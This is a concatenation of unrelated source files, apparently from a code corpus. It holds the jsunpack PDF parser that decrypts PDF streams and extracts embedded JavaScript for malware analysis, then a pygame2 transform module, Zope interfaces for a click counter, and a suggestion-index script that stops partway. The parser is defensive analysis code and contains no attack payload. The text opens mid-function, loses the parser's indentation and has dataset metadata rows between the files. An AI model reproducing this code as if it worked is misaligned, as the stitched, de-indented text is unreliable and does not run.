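    name = pdfobj.fixPound('/Java#53cript')   # '#53' is hex for 'S' -> '/JavaScript'
    text = pdfobj.rldecode('\x02abc\x80')     # literal run of three bytes, then EOD marker -> 'abc'
    return name, text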
class olivia(object):
DEBUG = 0
def __init__(self, indata, infile, password=''):
self.indata = indata
self.size = len(self.indata)
self.infile = infile
self.objects = {}
self.pages = []
self.numPages = 0
self.list_obj = []
self.jsObjects = []
self.encrypt_key = ''
self.encrypt_key_valid = False
self.encrypt_object = {}
self.encrypt_password = password
self.xfaObjects = []
def parse(self):
'''
#parsing xref tables
xrefs = re.findall('xref\s*\n\d+\s+(\d+)\s*\n((\d+\s+\d+\s+[fn]\s*\n)+)\s*trailer\s*\n',self.indata)#.*?startxref\s*\n(\d+)\s*\n\s*%%EOF\s*',self.indata)
for entries, table,junk in xrefs:
entries = int(entries)
print 'entries=',entries
lines = table.split('\n')
for line in lines:
valid = re.match('\s*(\d+)\s+(\d+)\s+[fn]\s*',line)
if valid:
offset,zero = int(valid.group(1)), int(valid.group(2))
print 'line = ', offset, zero
#offset = int(offset)
'''
objs = re.findall('\n?(\d+)\s+(\d+)[\x00\s]+obj[\s]*(.*?)\s*\n?(?<!%)(endobj|.ndobj|e.dobj|en.obj|end.bj|endo.j|endob.|objend)', self.indata, re.MULTILINE | re.DOTALL)
if objs:
for obj in objs:
#fill all objects
key = obj[0] + ' ' + obj[1]
if not key in self.list_obj:
self.list_obj.append(key)
				else: # There are cases where two objects share the same number, because PDFs are awesome that way
key = key + ' dup'
self.list_obj.append(key)
self.objects[key] = pdfobj(key, obj[2])
trailers = re.findall('(trailer[\s\r\n]*<<(.*?)>>)', self.indata, re.MULTILINE | re.DOTALL)
for trailertags in trailers:
trailerData = trailertags[1]
#
# Check for a dictionary inside the trailer
#
isDict = trailerData.find("<<")
if isDict != -1:
offset = self.indata.find(trailertags[0])
trailerData = self.extractTrailerData(offset)
trailerstream = '' #no stream in trailer
trailerobj = pdfobj('trailer', '') #empty second parameter indicates not to do an object parse
trailerobj.parseTag(trailerData, trailerstream)
trailerobj.parseChildren()
key = 'trailer'
if not key in self.list_obj:
self.list_obj.append(key)
			else: # There are cases where two objects share the same number, because PDFs are awesome that way
key = key + ' dup'
self.list_obj.append(key)
self.objects[key] = trailerobj
for tag, value in trailerobj.children:
# If there is an encrypt object, it should be specified in the trailer
# (in practice, that's not always the case... *sigh*)
if tag == 'Encrypt' and not self.encrypt_key_valid:
# Make sure the encrypt object is actually there
if value in self.objects:
self.objects[value].isEncrypt = True
self.encrypt_object = self.populate_encrypt_object(self.objects[value])
fileId = ''
for state, tag, val in trailerobj.tags:
if tag == 'ID':
ids = re.findall('<([\d\w]*)>', val)
# Just in case the ID has something I'm not expecting
if ids:
try:
fileId = binascii.unhexlify(ids[0])
except:
pass
else:
fileId = val
# yay for default passwords
padding = binascii.unhexlify('28BF4E5E4E758A4164004E56FFFA01082E2E00B6D0683E802F0CA9FE6453697A')
						# padded password is limited to 32 characters
passwd = (self.encrypt_password + padding)[0:32]
self.encrypt_key = self.compute_encrypt_key(self.encrypt_object, passwd, fileId)
self.encrypt_key_valid = self.validate_encrypt_key(self.encrypt_key, padding, fileId, self.encrypt_object)
break
# but wait, sometimes the encrypt object is not specified in the trailer, yet sometimes another
# object has it in it, so search for it now
if not self.encrypt_key_valid:
encrypt_object_key = ''
fileId = '\x00' * 16
for key in self.list_obj:
if key == 'trailer':
continue
for kstate, k, kval in self.objects[key].tags:
if k == 'Encrypt':
for child_type, child_key in self.objects[key].children:
if child_type == 'Encrypt':
self.objects[child_key].isEncrypt = True
encrypt_object_key = child_key
break
if k == 'ID':
ids = re.findall('\[([\d\w]*)\]', kval)
if ids:
firstId = ids[0]
# for some reason it's there twice...
firstId = firstId[0:len(firstId)/2]
try:
fileId = binascii.unhexlify(firstId)
except:
pass
if encrypt_object_key and fileId:
break
if encrypt_object_key and fileId: # we found it
self.encrypt_object = self.populate_encrypt_object(self.objects[encrypt_object_key])
padding = binascii.unhexlify('28BF4E5E4E758A4164004E56FFFA01082E2E00B6D0683E802F0CA9FE6453697A')
# limit of 32 characters here
passwd = (self.encrypt_password + padding)[0:32]
self.encrypt_key = self.compute_encrypt_key(self.encrypt_object, passwd, fileId)
if self.encrypt_object['V'] == 5 and self.encrypt_key != '\xca\x1e\xb0' and 'Perms' in self.encrypt_object:
aes = AES.new(self.encrypt_key, AES.MODE_ECB)
decryptedPerms = aes.decrypt(self.encrypt_object['Perms'])
if decryptedPerms[0:4] == self.encrypt_object['P'][0:4] and decryptedPerms[9:12] == 'adb':
self.encrypt_key_valid = True
else:
self.encrypt_key_valid = self.validate_encrypt_key(self.encrypt_key, padding, fileId, self.encrypt_object)
for key in self.list_obj: #sorted(self.objects.keys()):
#set object options
if self.encrypt_key and self.encrypt_key_valid:
if self.objects[key].tagstream and not self.objects[key].isEncrypt and not self.objects[key].isFromObjStream:
if self.encrypt_object['algorithm'] == 'RC4':
self.objects[key].tagstream = self.decryptRC4(self.objects[key].tagstream, key)
elif self.encrypt_object['algorithm'] == 'AES':
self.objects[key].tagstream = self.decryptAES(self.objects[key].tagstream, key)
self.objects[key].tagstreamModified = True
for kstate, k, kval in self.objects[key].tags:
if k == 'OpenAction':
# sometimes OpenAction is an array, so check for that
if not kval or kval[0] != '[':
self.objects[key].isDelayJS = True
for child_type, child_key in self.objects[key].children:
if child_type == 'OpenAction' and child_key in self.objects:
self.objects[child_key].isDelayJS = False # This isn't the JS, the children have it
for cState, cType, cValue in self.objects[child_key].tags:
if cType in ['JavaScript', 'JS']:
self.objects[child_key].isDelayJS = True
elif olivia.DEBUG:
print 'error: not a valid object for child (%s)' % (child_key)
if k in ['JavaScript', 'JS']:
self.objects[key].isJS = True
foundChildJs = False
for child_type, child_key in self.objects[key].children: # Is the JS with the children?
if child_key in self.objects and child_type in ['JS', 'JavaScript']:
self.objects[child_key].isJS = True
self.objects[key].isJS = False
if child_key not in self.jsObjects:
self.jsObjects.append(child_key)
foundChildJs = True
if not foundChildJs: # JS is here
if key not in self.jsObjects:
self.jsObjects.append(key)
if k == 'XFA':
self.objects[key].is_xfa = True
for xfaType, xfaKey in self.objects[key].xfaChildren:
if xfaKey in self.objects:
self.objects[xfaKey].is_xfaData = True
if k == 'NM':
self.objects[key].knownName = kval
if k == 'Subj':
self.objects[key].subj = kval
if k == 'EmbeddedFile':
self.objects[key].isEmbedded = True
if k == 'Annot':
#since JavaScript can call getAnnots() we must populate these entries now
#don't handle /Annots (precursory tag), children will contain Subj element
self.objects[key].isAnnot = True
for type, childkey in self.objects[key].children:
if childkey in self.objects and (type == 'Subj'):
self.objects[childkey].isAnnot = True
self.jsObjects.append(childkey)
if k == 'Page':
hasContents = False
for childtype, childkey in self.objects[key].children:
if childtype == 'Contents':
self.pages.append(childkey)
hasContents = True
if not hasContents:
self.pages.append(key)
if k == 'Pages':
for pagestate, pagetag, pagevalue in self.objects[key].tags:
if pagetag == 'Count':
try:
self.numPages += int(pagevalue)
except ValueError:
# Check children
for childtype, childkey in self.objects[key].children:
if childtype == 'Count':
pagevalue = self.objects[childkey].indata
try:
self.numPages += int(pagevalue)
except ValueError:
pass
#populate pdfobj's doc_properties with those that exist
enum_properties = ['Title', 'Author', 'Subject', 'Keywords', 'Creator', 'Producer', 'CreationDate', 'ModDate', 'plot']
if k in enum_properties:
value = kval
value = re.sub('[\xff\xfe\x00]', '', value)
isReference = re.match('^\s*\d+\s+\d+\s+R\s*$', value)
if isReference:
validReference = False
for child_type, child_key in self.objects[key].children:
if child_key in self.objects and (child_type == k):
validReference = True
self.objects[child_key].doc_properties.append(k.lower())
self.jsObjects.append(child_key)
if not validReference:
if olivia.DEBUG:
print '[warning] possible invalid reference in %s' % (k)
self.objects[key].doc_properties.append(k.lower())
else:
#not a reference, use the direct value
value = re.sub('\'', '\\x27', value)
self.objects[key].staticScript += 'info.%s = String(\'%s\');\n' % (k.lower(), olivia.do_hexAscii(value))
self.objects[key].staticScript += 'this.%s = info.%s;\n' % (k.lower(), k.lower())
self.objects[key].staticScript += 'info.%s = info.%s;\n' % (k, k.lower())
self.objects[key].staticScript += 'app.doc.%s = info.%s;\n' % (k.lower(), k.lower())
self.objects[key].staticScript += 'app.doc.%s = info.%s;\n' % (k, k.lower())
if k == 'CreationDate':
self.objects[key].staticScript += 'app.doc.creationDate = info.creationdate;\n'
self.objects[key].staticScript += 'info.creationDate = info.creationdate;\n'
if key not in self.jsObjects:
self.jsObjects.append(key)
for kstate, k, kval in self.objects[key].tags:
# Multiple filters, sometimes pound issues, throws off the decode, so handle it here
if k == 'Filter':
kval = pdfobj.fixPound(kval)
filters = re.findall('/(\w+)', kval)
if filters:
for filter in filters:
if filter == 'FlateDecode' or filter == 'Fl':
try:
self.objects[key].tagstream = zlib.decompress(self.objects[key].tagstream)
except zlib.error, msg:
if olivia.DEBUG:
print 'failed to decompress object %s (inlen %d)' % (key, len(self.objects[key].tagstream))
print self.objects[key].tagstream
self.objects[key].tagstream = '' #failed to decompress
if filter == 'ASCIIHexDecode' or filter == 'AHx':
result = ''
counter = 0
self.objects[key].tagstream = re.sub('[^a-fA-F0-9]+', '', self.objects[key].tagstream)
for i in range(0, len(self.objects[key].tagstream), 2):
result += chr(int('0x' + self.objects[key].tagstream[i:i + 2], 0))
self.objects[key].tagstream = result
if filter == 'ASCII85Decode' or filter == 'A85':
self.objects[key].tagstream = pdfobj.ascii85(self.objects[key].tagstream)
if filter == 'LZWDecode' or filter == 'LZW':
self.objects[key].tagstream = pdfobj.lzwdecode(self.objects[key].tagstream)
if filter == 'RunLengthDecode' or filter == 'RL':
self.objects[key].tagstream = pdfobj.rldecode(self.objects[key].tagstream)
if k == 'FlateDecode' or k == 'Fl':
try:
self.objects[key].tagstream = zlib.decompress(self.objects[key].tagstream)
except zlib.error, msg:
# There is a chance our regex removed too many \r or \n when pulling out the stream. We probably
						# should fix this there, but in the meantime, if it fails, try adding them back.
lame_fixes = ["\n", "\r"]
lame_fix_worked = True
for lame_fix in lame_fixes:
try:
self.objects[key].tagstream = zlib.decompress(self.objects[key].tagstream+lame_fix)
lame_fix_worked = True
break
except zlib.error, msg:
pass
if not lame_fix_worked:
if olivia.DEBUG:
print 'failed to decompress object %s (inlen %d)' % (key, len(self.objects[key].tagstream))
print self.objects[key].tagstream
self.objects[key].tagstream = '' #failed to decompress
if k == 'ASCIIHexDecode' or k == 'AHx':
result = ''
counter = 0
self.objects[key].tagstream = re.sub('[^a-fA-F0-9]+', '', self.objects[key].tagstream)
for i in range(0, len(self.objects[key].tagstream), 2):
result += chr(int('0x' + self.objects[key].tagstream[i:i + 2], 0))
self.objects[key].tagstream = result
if k == 'ASCII85Decode' or k == 'A85':
self.objects[key].tagstream = pdfobj.ascii85(self.objects[key].tagstream)
if k == 'LZWDecode' or k == 'LZW':
self.objects[key].tagstream = pdfobj.lzwdecode(self.objects[key].tagstream)
if k == 'RunLengthDecode' or k == 'RL':
self.objects[key].tagstream = pdfobj.rldecode(self.objects[key].tagstream)
# Check for Object Streams, but only if we don't have an error with tagstream
if not self.objects[key].tagstreamError:
object_stream_data = ''
object_stream_n = 0
object_stream_first = 0
for kstate, k, kval in self.objects[key].tags:
if k == 'ObjStm':
object_stream_data = self.objects[key].tagstream
if k == 'N':
# just in case
try:
object_stream_n = int(kval)
except:
pass
if k == 'First':
# ...
try:
object_stream_first = int(kval)
except:
pass
if object_stream_data != '' and object_stream_n != 0 and object_stream_first != 0:
self.parse_object_stream(object_stream_data, object_stream_n, object_stream_first)
self.objects[key].tagstream = olivia.applyFilter(self.objects[key].tagstream)
if olivia.DEBUG and self.objects[key].tagstream.startswith('MZ'):
print 'PDF file has embedded MZ file'
else:
print 'Fatal error: pdf has no objects in ' + self.infile
def populate_encrypt_object(self, encrypt_object):
e = {}
e['V'] = 0
e['R'] = 0
e['O'] = ''
e['U'] = ''
for state, tag, value in encrypt_object.tags:
# Multiple lengths, referring to different things, take the bigger one, that *should* be right
if tag == 'Length' and 'Length' in e:
if int(value) > int(e[tag]):
e[tag] = value
continue
e[tag] = value
e['KeyLength'] = 5
if 'AESV2' in e or 'AESV3' in e:
e['algorithm'] = 'AES'
else:
e['algorithm'] = 'RC4'
if 'EncryptMetadata' in e:
if e['EncryptMetadata'].lower() == 'false':
e['EncryptMetadata'] = False
else:
e['EncryptMetadata'] = True
if 'V' in e:
e['V'] = int(e['V'])
if e['V'] >= 2 and 'Length' in e:
e['KeyLength'] = int(e['Length'])/8
if 'R' in e:
e['R'] = int(e['R'])
if e['R'] <= 4 and len(e['O']) > 32:
e['O'] = binascii.unhexlify(e['O'].strip())
if e['R'] <= 4 and len(e['U']) > 32:
e['U'] = binascii.unhexlify(e['U'].strip())
if 'P' in e:
e['P'] = struct.pack('L', int(e['P']) & 0xffffffff)
return e
def compute_encrypt_key(self, encrypt_object, password, fileId):
'''Computes the encrypt key based on values in encrypt object'''
if encrypt_object['R'] <= 4:
h = hashlib.md5()
h.update(password)
h.update(encrypt_object['O'])
h.update(encrypt_object['P'][0:4])
h.update(fileId)
if encrypt_object['R'] == 4 and not encrypt_object['EncryptMetadata']:
h.update("\xff\xff\xff\xff")
key = h.digest()[0:encrypt_object['KeyLength']]
if encrypt_object['R'] >= 3:
for i in range(50):
key = hashlib.md5(key[0:encrypt_object['KeyLength']]).digest()
key = key[0:encrypt_object['KeyLength']]
return key
elif encrypt_object['R'] == 5:
user_key = hashlib.sha256(encrypt_object['U'][32:40]).digest()
if user_key == encrypt_object['U'][0:32]: # success!
almost_key = hashlib.sha256(encrypt_object['U'][40:48]).digest()
aes = AES.new(almost_key, AES.MODE_CBC, '\x00'*16)
the_key = aes.decrypt(encrypt_object['UE'])
return the_key
#
# Ok, then check the owner password
#
owner_sha = hashlib.sha256()
owner_sha.update(encrypt_object['O'][32:40])
owner_sha.update(encrypt_object['U'][0:48])
owner_hash = owner_sha.digest()
if owner_hash == encrypt_object['O'][0:32]:
almost_hash = hashlib.sha256()
almost_hash.update(encrypt_object['O'][40:48])
almost_hash.update(encrypt_object['U'][0:48])
almost_key = almost_hash.digest()
aes = AES.new(almost_key, AES.MODE_CBC, '\x00'*16)
the_key = aes.decrypt(encrypt_object['OE'])
return the_key
else:
print "No good", encrypt_object['R']
return '\xca\x1e\xb0'
def validate_encrypt_key(self, key, password, fileId, encrypt_object):
'''Verifies that the encryption key is correct'''
if encrypt_object['R'] == 2:
rc4 = ARC4.new(key)
password_encrypted = rc4.encrypt(password)
if encrypt_object['U'] == password_encrypted:
return True
elif encrypt_object['R'] >= 3:
m = hashlib.md5()
m.update(password)
m.update(fileId)
cHash = m.digest()
rc4 = ARC4.new(key)
dHash = rc4.encrypt(cHash)
for i in range(1, 20):
newKey = ''
for k in key:
newKey += chr(ord(k) ^ i)
stepE = ARC4.new(newKey)
dHash = stepE.encrypt(dHash)
if dHash == encrypt_object['U'][0:16]:
return True
else:
print "No good", encrypt_object['R']
return False
def parse_object_stream(self, data, n, first):
integer_pairs = re.findall('(\d+) +(\d+)', data[0:first])
for i, pairs in enumerate(integer_pairs):
key = str(pairs[0]) + " 0"
start_offset = first + int(pairs[1])
if i+1 == n:
end_offset = None
else:
end_offset = first + int(integer_pairs[i+1][1])
obj_data = data[start_offset:end_offset]
if not key in self.list_obj:
self.list_obj.append(key)
else:
key = key + ' dup'
self.list_obj.append(key)
self.objects[key] = pdfobj(key, obj_data)
self.objects[key].isFromObjStream = True
return
def extractTrailerData(self, trailer_start):
dictionaries = 0
trailer_end = trailer_start
first_dictionary = False
while dictionaries != 0 or not first_dictionary:
d = self.indata[trailer_end:trailer_end+2]
if d == '<<':
first_dictionary = True
dictionaries += 1
trailer_end += 2
continue
elif d == '>>':
dictionaries -= 1
trailer_end += 2
continue
elif d == '':
break
trailer_end += 1
trailer = self.indata[trailer_start:trailer_end]
return trailer
def decryptRC4(self, data, key):
'''
Input: data is the data to decrypt, key is the obj information of the form '5 0'
Assumptions: self.encrypt_key is set
Output: returns string of decrypted data
'''
try:
obj, rev = key.split(' ')
keyLength = self.encrypt_object['KeyLength'] + 5
if keyLength > 16:
keyLength = 16
decrypt_key = hashlib.md5(self.encrypt_key + struct.pack('L', int(obj))[0:3] + struct.pack('L', int(rev))[0:2]).digest()[0:keyLength]
cipher = ARC4.new(decrypt_key)
return cipher.decrypt(data)
except:
return ''
def decryptAES(self, aes_data, objectKey):
'''Function that will take AES encrypted data and decrypt it'''
if self.encrypt_object['V'] <= 4:
try:
obj, rev = objectKey.split(' ')
keyLength = self.encrypt_object['KeyLength'] + 5
if keyLength > 16:
keyLength = 16
m = hashlib.md5()
m.update(self.encrypt_key)
m.update(struct.pack('L', int(obj))[0:3])
m.update(struct.pack('L', int(rev))[0:2])
m.update('\x73\x41\x6c\x54')
aes_key = m.digest()[0:keyLength]
iv = aes_data[0:16]
aes = AES.new(aes_key, AES.MODE_CBC, iv)
pad_size = 16 - (len(aes_data)%16)
pad = "C" * pad_size
data = aes.decrypt(aes_data[16:] + pad)[0:(pad_size*-1)]
return data
except Exception:
return ''
else:
try:
iv = aes_data[0:16]
aes = AES.new(self.encrypt_key, AES.MODE_CBC, iv)
pad_size = 16 - (len(aes_data)%16)
pad = "C" * pad_size
data = aes.decrypt(aes_data[16:] + pad)[0:(pad_size*-1)]
return data
except Exception:
return ''
def is_valid(self):
'''Determines if this is a valid PDF file or not'''
if 0 <= self.indata[0:1024].find('%PDF-') <= 1024:
return True
return False
def __repr__(self):
if not self.is_valid():
return 'Invalid PDF file "%s"' % (self.infile)
out = 'PDF file %s has %d obj items\n' % (self.infile, len(self.objects))
for obj in sorted(self.objects.keys()):
out += str(self.objects[obj]) + '\n'
return out
def get_javascript(self):
'''Extracts all JavaScript from the PDF'''
out = ''
sloppy_flag = False
for jskey in self.jsObjects:
if self.objects[jskey].tagstreamError:
continue
if self.objects[jskey].staticScript:
out += self.objects[jskey].staticScript
if self.objects[jskey].tagstream:
value = self.objects[jskey].tagstream
value = re.sub('\'', '\\x27', value)
# Sometimes there is just weird data there (or unicode), maybe getting rid of it helps
# (like below)
value = re.sub('[\x00-\x1f\x7f-\xff]', '', value)
if self.objects[jskey].isAnnot:
out += 'var zzza = []; if(zzzannot.length > 0){ zzza=zzzannot.pop(); } zzza.push({subject:\'%s\'}); zzzannot.push(zzza);\n' % (value) #getAnnots
if self.objects[jskey].knownName:
if self.objects[jskey].subj:
subj = self.objects[jskey].subj
else:
subj = value
subj = re.sub('[\x00-\x1f\x7f-\xff]', '', subj) # <- below
out += 'zzzannot2["%s"] = {subject:\'%s\'};\n' % (self.objects[jskey].knownName, subj) #getAnnot
for doc_prop in self.objects[jskey].doc_properties:
out += 'info.%s = String(\'%s\'); this.%s = info.%s;\n' % (doc_prop, olivia.do_hexAscii(value), doc_prop, doc_prop)
if self.pages:
for page in self.pages:
if page in self.objects:
lines = self.objects[page].tagstream.split('\n')
out += 'c = []; '
for line in lines:
text_be = re.findall('BT[^(]*\(([^)]+)\)[^)]*?ET', line)
for hexdata in text_be:
words = hexdata.strip().split(' ')
for word in words:
out += 'c.push("%s"); ' % (olivia.do_hexAscii(word))
out += 'zzzpages.push(c); this.numPages = zzzpages.length; xfa.host.numPages = zzzpages.length;\n'
else:
out += 'this.numPages = ' + str(self.numPages) + ';\n'
out += 'xfa.host.numPages = ' + str(self.numPages) + ';\n'
else:
out += 'c = []; '
out += 'zzzpages.push(c); this.numPages = zzzpages.length; xfa.host.numPages = zzzpages.length;\n'
out += '\nfilesize = ' + str(self.size) + ';\n'
if out:
out += '\n//jsunpack End PDF headers\n'
headersjs = out #split value into 2 return values [js, header_js]
out = ''
delayout = ''
for jskey in self.jsObjects:
if self.objects[jskey].tagstreamError:
continue
# only do it if no encryption or it was decrypted
if self.encrypt_key == '' or self.encrypt_key_valid == True:
if self.objects[jskey].isDelayJS: #do this first incase the tag has /OpenAction /JS (funct())
if olivia.DEBUG:
print 'Found JavaScript (delayed) in %s (%d bytes)' % (jskey, len(self.objects[jskey].tagstream))
delayout += self.objects[jskey].tagstream
elif self.objects[jskey].isJS:
if olivia.DEBUG:
print 'Found JavaScript in %s (%d bytes)' % (jskey, len(self.objects[jskey].tagstream))
#if jskey == '84 0':
# print self.objects[jskey].tagstream
if len(self.objects[jskey].tagstream) > 4 and self.objects[jskey].tagstream[3] != '\x00':
out += self.objects[jskey].tagstream
if out[-1] not in[';', '}']:
out += ';'
else:
temp_js = re.sub(r'([^\x00])\x0a', r'\1', self.objects[jskey].tagstream)
temp_js = re.sub(r'([^\x00])\x0d', r'\1', temp_js)
temp_js = re.sub('^([\x80-\xff])', '', temp_js)
temp_js = re.sub('([\x00-\x08\x0b\x0c\x0e-\x1f])', '', temp_js)
temp_js = re.sub('([\x80-\xff])', 'C', temp_js)
out += temp_js
if olivia.DEBUG:
if self.objects[jskey].isJS or self.objects[jskey].isDelayJS:
print '\tchildren ' + str(self.objects[jskey].children)
print '\ttags ' + str(self.objects[jskey].tags)
print '\tindata = ' + re.sub('[\n\x00-\x19\x7f-\xff]', '', self.objects[jskey].indata)[:100]
for key in self.list_obj:
if self.objects[key].is_xfa and (self.encrypt_key == '' or self.encrypt_key_valid):
xfa_data = ''
for xfa_type, xfa_key in self.objects[key].xfaChildren:
if xfa_key in self.list_obj:
xfa_data += self.objects[xfa_key].tagstream
# gets rid of some crap. But unicode will probably cause problems down the road
xfa_data = re.sub('^([\x80-\xff])', '', xfa_data)
xfa_data = re.sub('([\x00-\x08\x0b\x0c\x0e-\x1f])', '', xfa_data)
xfa_data = re.sub('([\x80-\xff])', 'C', xfa_data)
try:
doc = xml.dom.minidom.parseString(xfa_data)
except Exception as e:
print "drat", str(e)
continue
scriptElements = doc.getElementsByTagNameNS("*", "script")
if not scriptElements:
continue
for script in scriptElements:
if script.getAttribute('contentType') != 'application/x-javascript' or not script.childNodes:
continue
js = script.childNodes[0].data
# maybe?
if type(js) == unicode:
js = unicode(js).encode('utf-8')
dataForJs = ''
jsNode = script.parentNode.parentNode
jsName = jsNode.getAttribute('name')
if type(jsName) == unicode:
jsName = unicode(jsName).encode('utf-8')
dataElements = doc.getElementsByTagName(jsName)
if dataElements and dataElements[0].childNodes and dataElements[0].childNodes[0].nodeType == xml.dom.minidom.Node.TEXT_NODE:
dataForJs = dataElements[0].childNodes[0].data.replace('\n', '').replace('\r', '')
xfa_javascript = ''
if jsName:
xfa_javascript += jsName + "=this;\n"
xfa_javascript += 'var rawValue = "' + dataForJs.strip() + '";\n'
for k in jsNode.attributes.keys():
xfa_javascript += jsName + '.' + k + ' = "' + jsNode.getAttribute(k) + '";\n'
xfa_javascript += js + '\n'
if jsName:
xfa_javascript += 'print("<rawValue>" + ' + jsName + '.rawValue + "</rawValue>");\n'
out += xfa_javascript
if len(out + delayout) <= 0:
#Basically if we don't find ANY JavaScript, then we can parse the other elements
for jskey in self.objects.keys():
sloppy = re.search('function |var ', self.objects[jskey].tagstream)
if sloppy:
sloppy_flag = True
out += self.objects[jskey].tagstream
if olivia.DEBUG:
print 'Sloppy PDF parsing found %d bytes of JavaScript' % (len(out))
return re.sub('[\x00-\x08\x0b\x0c\x0e-\x1f\x80-\xff]', '', out + delayout), headersjs, sloppy_flag
@staticmethod
def do_hexAscii(input):
return re.sub('([^a-zA-Z0-9])', lambda m: '\\x%02x' % ord(m.group(1)), input)
@staticmethod
def applyFilter(data):
if len(data) > 10000000:
return data
for i in range(0, len(data)):
c = ord(data[i])
if 0 < c < 0x19 or 0x7f < c < 0xff or data[i] in ' \n\r':
pass #cut beginning non-ascii characters
else:
data = data[i:]
break
data = data[::-1] #reversed
for i in range(0, len(data)):
c = ord(data[i])
if 0 < c < 0x19 or 0x7f < c < 0xff or data[i] in ' \n\r':
pass #cut trailing non-ascii characters
else:
data = data[i:]
break
output = data[::-1]
#output = re.sub('^[\x00-\x19\x7f-\xff\n\s]*[\x00-\x19\x7f-\xff]','',input) #look for starting non-ascii characters
#output = re.sub('[\x00-\x19\x7f-\xff\s]+$','',output) #look for trailing non-ascii characters
return output
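# Illustrative usage sketch (not part of the original module): how the classes
# above fit together for a one-shot extraction. The file handling here is an
# assumption; jsunpack normally drives this from its own entry points.
def _example_extract_javascript(path):
    data = open(path, 'rb').read()
    pdf = olivia(data, path)
    if not pdf.is_valid():
        return ''
    pdf.parse()
    js, header_js, sloppy = pdf.get_javascript()
    return header_js + js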
| gpl-2.0 | -9,150,533,911,025,023,000 | 45.813061 | 175 | 0.458253 | false | 4.278914 | false | false | false |
ShadowApex/pygame-sdl2 | pygame2/transform/__init__.py | 1 | 2142 | #!/usr/bin/python
import sdl2
import sdl2.sdlgfx
from sdl2 import surface
import pygame2
def scale(surface, size, dest_sprite=None, resample=0):
"""Scale an image using python's imaging library."""
if not pygame2.display.window:
raise Exception("Error: Window has not yet been created.")
sprite = surface.sprite
# Resize the image using PIL
try:
img = sprite.pil.resize(size, resample)
except AttributeError:
print "ERROR: This surface does not have a PIL object! Resizing image failed."
return surface
# Create an SDL2 surface from our sprite.
surface, pil_surface = pygame2.image.load_image(img)
# Create a new sprite from the surface.
scaled_sprite = pygame2.display.window.factory.from_surface(surface)
scaled_sprite.angle = sprite.angle
scaled_sprite.pil = pil_surface
# If we're using a software renderer, keep an original for rotation.
if pygame2.display.window.type == "software":
scaled_sprite.original = pygame2.display.window.factory.from_surface(surface, True)
else:
scaled_sprite.sw_sprite = pygame2.display.window.sw_factory.from_surface(surface, True)
image = pygame2.Surface(sprite=scaled_sprite)
return image
def copy(surface):
if not pygame2.display.window:
raise Exception("Error: Window has not yet been created.")
sprite = surface.sprite
# Resize the image using PIL
img = sprite.pil
# Create an SDL2 surface from our sprite.
surface, pil_surface = pygame2.image.load_image(img)
# Create a new sprite from the surface.
new_sprite = pygame2.display.window.factory.from_surface(surface)
new_sprite.angle = sprite.angle
new_sprite.pil = pil_surface
# If we're using a software renderer, keep an original for rotation.
if pygame2.display.window.type == "software":
new_sprite.original = pygame2.display.window.factory.from_surface(surface, True)
else:
new_sprite.sw_sprite = pygame2.display.window.sw_factory.from_surface(surface, True)
image = pygame2.Surface(sprite=new_sprite)
return image
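# Illustrative usage sketch (not part of the original module): both helpers need an
# existing pygame2.display window and a Surface whose sprite carries a PIL image,
# which is what load_image() attaches.
def _example_thumbnail(img):
    thumb = scale(img, (64, 64))   # resized copy (PIL resample=0, nearest neighbour)
    backup = copy(img)             # independent duplicate at the original size
    return thumb, backup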
| gpl-2.0 | -6,444,661,151,184,808,000 | 28.75 | 95 | 0.697012 | false | 3.79115 | false | false | false |
ZeitOnline/zeit.today | src/zeit/today/interfaces.py | 1 | 1088 |
import zope.interface
import zope.schema
from zeit.cms.i18n import MessageFactory as _
class ICountStorage(zope.interface.Interface):
"""Central access to click counting.
This utility takes care of refreshing and caching today.xml.
"""
def get_count(unique_id):
"""Return access count for given unique id.
returns amount of hits (int) or None if nothing is known about the
given unique_id.
"""
def get_count_date(unique_id):
"""Return the date when the sample was taken."""
def __iter__():
"""Iterate over the stored unique_ids."""
LIFETIME_DAV_NAMESPACE = 'http://namespaces.zeit.de/CMS/lifetimecounter'
class ILifeTimeCounter(zope.interface.Interface):
"""Live time hit counter."""
total_hits = zope.schema.Int(
title=_('Total hits'),
description=_('Total hits between first and last count.'))
first_count = zope.schema.Date(
title=_('Date the first hit was counted on'))
last_count = zope.schema.Date(
title=_('Date the last hit was counted on'))
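# Illustrative sketch (not part of the original package): a minimal in-memory object
# that provides ILifeTimeCounter. The class name and attribute storage are assumptions
# for the example; real implementations presumably persist these values as DAV
# properties under the LIFETIME_DAV_NAMESPACE declared above.
@zope.interface.implementer(ILifeTimeCounter)
class ExampleLifeTimeCounter(object):

    def __init__(self, total_hits=0, first_count=None, last_count=None):
        self.total_hits = total_hits
        self.first_count = first_count
        self.last_count = last_count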
| bsd-3-clause | -7,988,097,960,612,468,000 | 23.727273 | 74 | 0.651654 | false | 4.04461 | false | false | false |
MingdaMingda/TO050001-TinySuggestion | server/bin/tiny_sugg.py | 1 | 3843 | #coding=utf-8
"""
@Brief build index of suggestion
@Author wmd
@Create 2015.11.05
"""
import sugg_conf
import sys
from pypinyin import lazy_pinyin
class SuggServer:
_h_tid2item = {}
_h_key2item = {}
_h_prefix2tids = {}
	@staticmethod
	def is_chinese_char(uchar):
		'''
		check whether the given unicode character is in the CJK unified ideograph range
		'''
		if uchar >= u'\u4e00' and uchar <= u'\u9fa5':
			return True
		else:
			return False
def load_item_set(self):
'''
load item-set
'''
ifilename = sugg_conf.FileOutputItemSet
sys.stderr.write('[trace] begin to build item-set from:%s\n' % (ifilename))
try:
ifile = open(ifilename, 'r')
except:
sys.stderr.write('[ERROR] cannot open file:%s\n' % ifilename)
sys.exit(-1)
line_no = 0
for line in ifile:
line_no += 1
fields = line.replace('\n', '').split('\t')
if len(fields) != 4:
sys.stderr.write('[ERROR] invalid fields-count:%d, not %d\n' % (len(fields), 4))
sys.exit(-1)
tid = int(fields[0])
text = fields[1]
score = int(fields[2])
att = fields[3]
item = {
'tid' : tid,
'text' : text,
'score' : score,
'att' : att,
}
key = '%s\t%s' % (text, att)
self._h_tid2item[tid] = item
self._h_key2item[key] = item
ifile.close()
sys.stderr.write('[trace] done:%s, %d lines\n' % (ifilename, line_no))
def load_prefix_index(self):
'''
load prefix-index-dict
'''
ifilename = '%s.prefix' % sugg_conf.FileOutput
sys.stderr.write('[trace] begin to load prefix-index from:%s\n' % (ifilename))
try:
ifile = open(ifilename, 'r')
except:
sys.stderr.write('[ERROR] cannot open file:%s\n' % ifilename)
sys.exit(-1)
line_no = 0
for line in ifile:
line_no += 1
fields = line.replace('\n', '').split('\t')
if len(fields) < 2:
sys.stderr.write('[ERROR] invalid fields-count:%d, < %d\n' % (len(fields), 2))
